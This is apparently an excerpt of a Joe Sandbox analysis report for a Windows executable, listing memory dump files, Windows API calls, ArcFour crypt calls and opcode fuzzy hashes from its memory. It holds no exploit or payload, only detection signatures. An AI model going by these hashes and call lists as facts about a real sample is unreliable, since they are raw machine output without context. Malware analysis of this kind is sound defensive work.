                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4011626565-0
                                                                                                                                        • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                                                                        • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                                                                                                        • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                                                                        • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1177325624-0
                                                                                                                                        • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                                                        • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                                                                        • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                                                        • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                                                                        APIs
                                                                                                                                        • IsIconic.USER32(?), ref: 0048397A
                                                                                                                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                                                                        • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Show$IconicLong
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2754861897-0
                                                                                                                                        • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                                                        • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                                                                                                        • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                                                        • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                                                                        • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                        • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                                                        • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                                                                        • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                                                        • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                                                                        APIs
                                                                                                                                        • IsIconic.USER32(?), ref: 004241E4
                                                                                                                                        • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                                                                          • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                                          • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021D25AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                                                                        • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ActiveFocusIconicShow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 649377781-0
                                                                                                                                        • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                                                        • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                                                                        • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                                                        • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                                                                        APIs
                                                                                                                                        • IsIconic.USER32(?), ref: 00417D0F
                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                                                        • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Placement$Iconic
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 568898626-0
                                                                                                                                        • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                                                        • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                                                                        • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                                                        • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CaptureIconic
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2277910766-0
                                                                                                                                        • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                                                        • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                                                                        • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                                                        • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                                                                        APIs
                                                                                                                                        • IsIconic.USER32(?), ref: 0042419B
                                                                                                                                          • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                                                          • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                                                          • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                                                          • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                                                        • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                                                                          • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2671590913-0
                                                                                                                                        • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                                                        • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                                                                        • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                                                        • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                                                                        APIs
                                                                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4255912815-0
                                                                                                                                        • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                                                        • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                                                                        • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                                                        • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                                                                        APIs
                                                                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4255912815-0
                                                                                                                                        • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                                                        • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                                                                        • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                                                        • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                                                                        APIs
                                                                                                                                        • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CryptFour
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2153018856-0
                                                                                                                                        • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                                                        • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                                                                        • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                                                        • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                                                                        APIs
                                                                                                                                        • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CryptFour
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2153018856-0
                                                                                                                                        • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                                                        • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                                                                                                        • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                                                        • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2505057540.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2505033769.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2505084610.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10000000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                                                        • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                                                                        • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                                                        • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2505057540.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2505033769.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2505084610.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10000000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                                                        • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                                                                        • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                                                                        • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
